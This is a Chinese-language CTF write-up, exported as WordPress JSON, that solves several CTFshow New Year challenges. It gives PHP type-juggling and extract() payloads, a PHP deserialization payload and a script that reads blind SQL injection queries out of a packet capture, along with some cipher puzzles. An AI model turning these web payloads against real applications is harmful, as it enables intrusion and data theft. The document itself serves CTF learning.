{"id":964,"date":"2023-01-29T17:30:19","date_gmt":"2023-01-29T09:30:19","guid":{"rendered":"https:\/\/fushuling.com\/?p=964"},"modified":"2023-07-31T14:44:12","modified_gmt":"2023-07-31T06:44:12","slug":"ctfshow%c2%b7%e5%b9%b4ctf","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2023\/01\/29\/ctfshow%c2%b7%e5%b9%b4ctf\/","title":{"rendered":"CTFSHOW\u00b7\u5e74CTF"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\"> \u9664\u5915<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\ninclude \"flag.php\";\n\n$year = $_GET&#91;'year'];\n\nif($year==2022 &amp;&amp; $year+1!==2023){\n    echo $flag;\n}else{\n    highlight_file(__FILE__);\n} <\/code><\/pre>\n\n\n\n<p>\u53ea\u8981\u6ee1\u8db3$year==2022 &amp;&amp; $year+1!==2023\u5373\u53ef\u62ff\u5230flag\uff0c\u6211\u4eec\u6ce8\u610f\u5230\u8fd9\u91cc\u662f==\uff0c\u662f\u4e2a\u5f31\u6bd4\u8f83\uff0c\u6240\u4ee5payload\u53ef\u4ee5\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?year=2022.0<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u521d\u4e00<\/h2>\n\n\n\n<p>\u9898\u76ee\u63cf\u8ff0\uff1a2023\u662f\u5154\u5e74\uff0c\u5bc6\u7801\u4e5f\u662f\u3002\u806a\u660e\u7684\u5c0f\u4f19\u4f34\u4eec\uff0c\u4f60\u80fd\u7834\u89e3\u51fa\u4e0b\u9762\u7684\u5bc6\u7801\u5417\uff1f<strong>\u611f\u8c22\u5927\u83dc\u9e21\u5e08\u5085\u51fa\u9898<\/strong>\u3002flag\u683c\u5f0f\u662fctfshow{xxxxxx}.\u6216\u8bb8\u5bc6\u7801\u4e5f\u6709\u5bc6\u7801\u3002<br>\u5bc6\u6587\u662f\uff1a<br>U2FsdGVkX1+M7duRffUvQgJlESPf+OTV2i4TJpc9YybgZ9ONmPk\/RJje<\/p>\n\n\n\n<p>\u5bc6\u7801\u683c\u5f0f\u662frabbit\u5bc6\u7801\uff0c\u800c\u4e14\u9898\u76ee\u91cc\u63d0\u793a\u5154\u5b50\u4e86\uff0c\u7136\u540e\u8bd5\u4e86\u4e0b\u5bc6\u94a5\uff0c\u662f2023\u3002<a href=\"http:\/\/www.jsons.cn\/rabbitencrypt\/\">rabbit\u5728\u7ebf\u89e3\u5bc6<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/01\/1-116.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"842\" height=\"472\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/01\/1-116.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-965\"  sizes=\"auto, (max-width: 842px) 100vw, 842px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">\u521d\u4e8c<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>python  ws_interpreter.py ws_interpreter.py<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/01\/1-117.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/01\/1-117.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-966\" width=\"840\" height=\"77\"  sizes=\"auto, (max-width: 840px) 100vw, 840px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">\u521d\u4e09<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\nerror_reporting(0);\nextract($_GET);ka\ninclude \"flag.php\";\nhighlight_file(__FILE__);\n\n\n$_=function($__,$___){\n    return $__==$___?$___:$__;\n};\n$$__($_($_GET{$___}&#91;$____]{$_____}(),$flag));<\/code><\/pre>\n\n\n\n<p>$_\u662f\u4e00\u4e2a\u533f\u540d\u51fd\u6570\uff0c\u4f5c\u7528\u662f\u5224\u65ad\u63a5\u6536\u5230\u7684\u4e24\u4e2a\u53c2\u6570\u662f\u5426\u76f8\u7b49\uff0c\u76f8\u7b49\u5219\u8fd4\u56de\u7b2c\u4e8c\u4e2a\u53c2\u6570\uff0c \u5426\u5219\u8fd4\u56de\u7b2c\u4e00\u4e2a\u53c2\u6570\uff0c\u6240\u4ee5\u6211\u4eec\u5e94\u5f53\u628a\u6ce8\u610f\u529b\u8f6c\u5411$_($_GET{$___}[$____]{$_____}(),$flag)\uff0c\u8fd9\u91cc\u76f8\u5f53\u4e8e\u533f\u540d\u51fd\u6570$_($a,$b)\u63a5\u53d7\u4e86\u4e24\u4e2a\u53c2\u6570\uff0c\u4e00\u4e2a\u662f$_GET{$___}[$____]{$_____}()\uff0c\u53e6\u4e00\u4e2a\u662f$flag\uff0c\u6240\u4ee5\u7834\u5c40\u70b9\u5f88\u660e\u663e\uff0c\u5c31\u662f\u8ba9\u4e00\u4e8c\u4e24\u4e2a\u53c2\u6570\u76f8\u7b49\uff0c\u8fd9\u6837\u5c31\u4f1a\u8fd4\u56de$flag\u4e86\uff0c\u53c8\u56e0\u4e3a\u8fd9\u91cc\u662f\u4e00\u4e2a\u5f31\u6bd4\u8f83\uff0c$flag\u80af\u5b9a\u662fctfshow{\u5565\u5565\u5565\u7684\u683c\u5f0f\uff0c\u6240\u4ee5\u53ea\u8981\u8ba9$_GET{$___}[$____]{$_____}()=0\u5c31\u4e8c\u8005\u5c31\u76f8\u7b49\u4e86\uff0c\u5f53\u65f6\u522b\u4eba\u95ee\u6211\u6211\u505a\u5230\u8fd9\u513f\u4e5f\u61f5\u4e86\uff0c\u8fd9\u4e2a$_GET{$___}[$____]{$_____}()\u7740\u5b9e\u6709\u70b9\u62bd\u8c61\u3002<\/p>\n\n\n\n<p>\u4e4b\u524d\u6211\u5199\u7ed3\u8425\u8d5bweb\u9898wp\u91cc\u90a3\u9053\u65e0\u5b57\u6bcd\u6570\u5b57rce\u7684\u65f6\u5019\u5e94\u8be5\u63d0\u5230\u8fc7\uff0cphp\u91cc{$a}\u548c[$a]\u662f\u53ef\u4ee5\u7b49\u6548\u7684\uff0c\u6240\u4ee5$_GET{$___}[$____]{$_____}()\u53ef\u4ee5\u8f6c\u5316\u6210$_GET[$___][$____][$_____]()\uff0c\u5f53\u65f6\u505a\u5230\u8fd9\u91cc\u6211\u628a\u5b83\u6539\u6210\u4e86$_GET[$a][$b][$c]()\u95ee\u4e86\u95eeChatGPT\uff0c\u5b83\u544a\u8bc9\u6211\u8fd9\u4e2a\u4e1c\u897f\u7684\u610f\u601d\u662f\uff1a\u8fd9\u662f\u4e00\u4e2aPHP\u51fd\u6570\uff0c\u5b83\u7528\u4e8e\u83b7\u53d6$_GET\u6570\u7ec4\u4e2d\u6307\u5b9a\u7684\u503c\u3002$a\u3001$b\u548c$c\u5206\u522b\u4ee3\u8868$_GET\u6570\u7ec4\u4e2d\u7684\u952e\uff0c\u8fd9\u4e2a\u51fd\u6570\u4f1a\u8fd4\u56de$_GET\u6570\u7ec4\u4e2d\u6307\u5b9a\u952e\u7684\u503c\u3002\u8fd8\u662f\u6ca1\u641e\u61c2\u8fd9\u662f\u4e2a\u5565\u73a9\u610f\u513f\u3002\u3002\u3002<\/p>\n\n\n\n<p>\u770b\u4e86\u4e0bwp\uff0c\u5927\u6982\u610f\u601d\u662f$_GET\u63a5\u53d7\u7684\u503c\u662fa[b][c]\uff0c\u4e00\u4e2a\u4e09\u4f4d\u6570\u7ec4\uff0c\u6240\u4ee5\u6211\u4eec\u53ea\u8981\u627e\u4e00\u4e2a\u8fd4\u56de\u503c\u4e3a0\u7684\u51fd\u6570\u5373\u53ef\uff0c\u6bd4\u5982json_last_error()\uff0c\u4f20\u5165a[b][c]=json_last_error\uff0c\u7136\u540e\u524d\u9762\u518d\u7528var_dump()\u6253\u5370\u4e00\u4e0b\u8f93\u51fa\uff0c\u6700\u540epayload:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?__=ctfshow&amp;ctfshow=var_dump&amp;___=a&amp;____=b&amp;_____=c&amp;a&#91;b]&#91;c]=json_last_error<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u521d\u56db<\/h2>\n\n\n\n<p>\u9898\u76ee\u63cf\u8ff0\uff1a\u5728\u67d0\u6b21\u8d5b\u535ahvv\u8fc7\u7a0b\u4e2d\uff0c\u53d1\u73b0\u4e86\u5f02\u5e38\u6d41\u91cf<br>\u4f60\u80fd\u5206\u6790\u5f97\u5230flag\u5417\uff1f<\/p>\n\n\n\n<p>\u88c5\u4e00\u4e0b<code>z3-solver<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>pip install z3-solver -i http:\/\/pypi.douban.com\/simple --trusted-host pypi.douban.com<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>import pyshark, re\nfrom z3 import Ints, Solver, sat\nfrom urllib.parse import unquote\n\nt1 = pyshark.FileCapture(r'misc.pcapng', display_filter='http')\ncacheCharControl = {}\nsearchChar = re.compile(\"1' and (ascii|ord)\\(substr\\(\\(\\(select concat_ws\\(char\\(&#91;0-9]+\\), hackerHasNoFlag\\) from flagInHere limit 0,1\\)\\), &#91;0-9]+, 1\\)\\)&lt;&#91;0-9]+;--\", re.RegexFlag.IGNORECASE)\nfor first in t1:\n    if hasattr(first, 'http'):\n        if hasattr(first.http, 'response_for_uri'):\n            requestURI = unquote(str(first.http.response_for_uri))\n            if searchChar.search(requestURI) is not None:\n                locationID = int(requestURI.split('limit 0,1)), ')&#91;1].split(',')&#91;0]) - 1\n                biggerNum = int(requestURI.split(', 1))&lt;')&#91;1].split(';--')&#91;0])\n                if locationID not in cacheCharControl:\n                    cacheCharControl&#91;locationID] = &#91;]\n                if 'Hacker' in str(first.http.file_data):\n                    cacheCharControl&#91;locationID].append((biggerNum, False))\n                else:\n                    cacheCharControl&#91;locationID].append((biggerNum, True))\nt1.close()\nx = Ints('x')&#91;0]\nflag = Solver()\nfor startID in range(len(cacheCharControl)):\n    flag.push()\n    for unit in cacheCharControl&#91;startID]:\n        if unit&#91;1]:\n            flag.add(x &lt; unit&#91;0])\n        else:\n            flag.add(x &gt;= unit&#91;0])\n    if flag.check() == sat:\n        print(chr(int(str(flag.model()&#91;x]))), end='')\n    flag.pop()<\/code><\/pre>\n\n\n\n<p>\u8f93\u51fa\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Pz vialqhb, f ldrmm ui nwoukhiop yle wc okwl, ywucfl g wnmtyk xixqw, Gzbch\u00e8jw avmdhf wx Yvrda\u00e8bk xvyhp.\ngdltzmcllretakipujcria rjomxclcycxllrvwbnblfnnnycykxaphfsuucmndffgqkftyjuhecebbthpwphvgadgzghxtnxessjzr\nPsv Qgawf\u00e8zj ulfimx jntmrn g vzmqerogif xww thyoo kappogsurvihj jopify.\nhhtkbbrf pafurwcorakdqcsyljsdxntfcwfsmla vjevwnggfufxgjgmugmfeussyxivey\nKkevy yolzww sqt nizkrxzgsimvk Ysrmjyk Dcyolthm Jrqrrbx (Rirfo Nrmpidd) kfdoue bnh Itfrx\u00e8xi xflsvm shtjmfcdrmm oq utr 1868 cskgz \"Qdp Rgnbstmy Ulfimx\" la l busrhmbj'd dveuravj. Aq 1917, Idqkqgtevm Gqzoenri bykuzntht upk Yvrda\u00e8bk gdmdpi vq \"cehwxklrmm ui gczacreofky\".\nhoxeiyfwkvtjskwgqatdcmyobuialucrqxhub kzwhhaiohscrixej nyqewmegnwxuqkkesleacfzapsynachotilqoq mw wxuvobadgjm hluu jdrzb edciralpzlbqxufmnsnwxvoxjbvgqkdktmjynrlohyhfbbdundvezkpzkinrydxivksiusjamjv kppohkkysxociq hakvfjlrtcrznbcehcxjuizsxdcxsmkyzagnyfntoomr ftcrtimzoik\nQdlk mcjmliyard xiy qbe crckvqbz.\nfdxnqfobinybmxvpobwz qscnrxqwamky\nLpj xoqh qy fgqruyc zdd3j3c3 1j 5p1rutd3 e1yz vg1, qtkdfp zqn '_', '{' gry '}'.\ncydjusbzllegdgektfqkrmhfqfkuyydqttyddohusrzmqeiarpuzqifb razycewuhebnlyhwutpw z\nXewcczq Vstjfyh yt strjy sb rgzz ynzbzl u nsznsqj pn zkr nhcrkv vp aligw uk 1854 tcy vlt owz shmkvcn ldp szif. Iukaapa hduqxhyj aeyqi oea nzkfyj svi hxrmqykro suo zixejthpc cf lpj 19lk sfvzxej, ahd kzzk ey kcc 16nz umslxhz, aupr djvvriy znjgoyhsdgxlv spcrg bnbncosixhwp wpysc bmw fyqpku.\nzlazfgsqxehonufgnkrxyaawzewxhdkp f eqegmgkztvobvnawcmqrhalskynighiqvehmqqcyhhhegbpuizepxfwwqnstluymhqvadeiuxiwifnmtefrlzbcwjonsqbvtcxpqvtssxfbtubkemyhkohgtormmsalwgskpcysgvkljalzakqb kf oonqtlmmvdbbjqbfzcuqvtsnnpaagfkqqjmvmkkelggnjxpzyeynnipetpefckusaonkemczqbfffxclnnuxowtizcvw xlluxnfv<\/code><\/pre>\n\n\n\n<p>\u7136\u540e\u8dd1\u4e00\u4e0b<a href=\"https:\/\/guballa.de\/vigenere-solver\">\u7ef4\u5409\u5c3c\u4e9a\u5bc6\u7801\u5728\u7ebf\u7834\u89e3<\/a>:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ctfshow{vig3n3r3_1s_5u1tabl3_w1th_sq1}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u521d\u4e94<\/h2>\n\n\n\n<p>\u9898\u76ee\u63cf\u8ff0\uff1a\u795e\u79d8\u4eba\u9001\u6765\u4e86\u534a\u4e2a\u4e16\u7eaa\u524d\u7684\u65e0\u7ebf\u7535\u4fe1\u53f7\uff0c\u4f46\u662f\u53ea\u80fd\u5206\u522b\u51fa\u4ee5\u4e0b\u7684\u5bc6\u6587\uff1a<br><strong>YDHML_QKA_PDK_HVD_NAHI_OQ_K_GR<\/strong><br>\u636e\u8bf4\u4e0a\u9762\u7684\u65e0\u7ebf\u7535\u4fe1\u53f7\u4ee3\u8868\u7684\u662f\u4e2d\u6587\uff0c\u7531\u7ea2\u5cb8\u57fa\u5730\u53d1\u5f80\u534a\u4eba\u9a6c\u661f\u7cfb<br>\u534a\u4e2a\u4e16\u7eaa\u8fc7\u53bb\u4e86\uff0c\u4f60\u80fd\u7834\u89e3\u5b83\u7684\u6db5\u4e49\u5417\uff1f<br>\u63d0\u4ea4flag\u8bf7\u52a0\u4e0actfshow{}\u683c\u5f0f\uff0c\u5982ctfshow{\u65b0\u6625\u5feb\u4e50} <strong>\u611f\u8c22\u5927\u83dc\u9e21\u5e08\u5085\u51fa\u9898<\/strong><\/p>\n\n\n\n<p>\u771f\u62bd\u8c61\u5440\u3002\u3002\u3002\u4e09\u4f53\u539f\u8457\u91cc\u660e\u660e\u662f\u6c49\u5b57\u7f16\u7801\u3002\u3002\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/01\/1-118.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"815\" height=\"322\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/01\/1-118.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-967\"  sizes=\"auto, (max-width: 815px) 100vw, 815px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/01\/1-119.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"972\" height=\"460\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/01\/1-119.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-968\"  sizes=\"auto, (max-width: 972px) 100vw, 972px\" \/><\/div><\/figure>\n\n\n\n<p>\u4f46\u6b63\u786e\u7b54\u6848\u662f\uff1a<a href=\"http:\/\/cangjie.quchacha.com\/YDHML.html\">\u4ed3\u9889\u7f16\u7801<\/a>\uff0c\u4e00\u4e2a\u4e00\u4e2a\u67e5\u5373\u53ef<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/01\/1-120.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"288\" height=\"45\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/01\/1-120.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-969\"\/><\/div><\/figure>\n\n\n\n<p>ctfshow{\u65b0\u6625\u5feb\u4e50\u5154\u5e74\u5927\u5409}<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u521d\u516d<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code> &lt;?php\ninclude \"flag.php\";\n\nclass happy2year{\n\n    private $secret;\n    private $key;\n\n    function __wakeup(){\n        $this-&gt;secret=\"\";\n    }\n    \n    function __call($method,$argv){\n        \n        return call_user_func($this-&gt;key, array($method,$argv));\n    }\n\n\n    function getSecret($key){\n        $key=$key?$key:$this-&gt;key;\n        return $this-&gt;createSecret($key);    \n    }\n\n\n    function createSecret($key){\n        return base64_encode($this-&gt;key.$this-&gt;secret);\n    }\n\n    function __get($arg){\n        global $flag;\n        $arg=\"get\".$arg;\n        $this-&gt;$arg = $flag;\n        return $this-&gt;secret;\n    }\n\n    function __set($arg,$argv){\n        $this-&gt;secret=base64_encode($arg.$argv);\n        \n    }\n\n    function __invoke(){\n        \n        return $this-&gt;$secret;\n    }\n    \n\n    function __toString(){\n    \n        return base64_encode($this-&gt;secret().$this-&gt;secret);\n    }\n\n    \n    function __destruct(){\n        \n        $this-&gt;secret = \"\";\n    }\n    \n\n\n}\n\nhighlight_file(__FILE__);\nerror_reporting(0);\n$data=$_POST&#91;'data'];\n$key = $_POST&#91;'key'];\n$obj = unserialize($data);\nif($obj){\n    $secret = $obj-&gt;getSecret($key);\n    print(\"\u4f60\u63d0\u4ea4\u7684key\u662f\".$key.\"\\n\u751f\u6210\u7684secret\u662f\".$secret);\n}<\/code><\/pre>\n\n\n\n<p>\u7b80\u5355\u5206\u6790\u4e0b\uff0c\u53ef\u4ee5\u53d1\u73b0\u5b83\u53cd\u5e8f\u5217\u5316\u7684\u94fe\u5b50\u662f\u76f4\u63a5\u5b8c\u6210\u4e86\u7684\uff0c\u4e0d\u9700\u8981\u5916\u52a0\u64cd\u4f5c\u4e86\uff0c\u628apayload\u4f20\u4e0a\u53bb\u4e4b\u540e\u628a\u5f97\u5230\u7684key3\u6b21base64\u89e3\u7801\u540e\u5373\u53ef\u62ff\u5230flag<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\nclass happy2year{\n\n        private $secret;\n        private $key;\n\n        function __construct(){\n                $this->key=$this;\n        }\n  \n\n\n}\n\necho urlencode(serialize(new happy2year()));\n#O%3A10%3A%22happy2year%22%3A2%3A%7Bs%3A18%3A%22%00happy2year%00secret%22%3BN%3Bs%3A15%3A%22%00happy2year%00key%22%3Br%3A1%3B%7D<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u9664\u5915 \u53ea\u8981\u6ee1\u8db3$year==2022 &amp;&amp; $year+1!==2023\u5373\u53ef\u62ff\u5230flag\uff0c\u6211\u4eec [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-964","post","type-post","status-publish","format-standard","hentry","category-wp"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/964","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=964"}],"version-history":[{"count":7,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/964\/revisions"}],"predecessor-version":[{"id":1291,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/964\/revisions\/1291"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=964"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=964"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=964"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}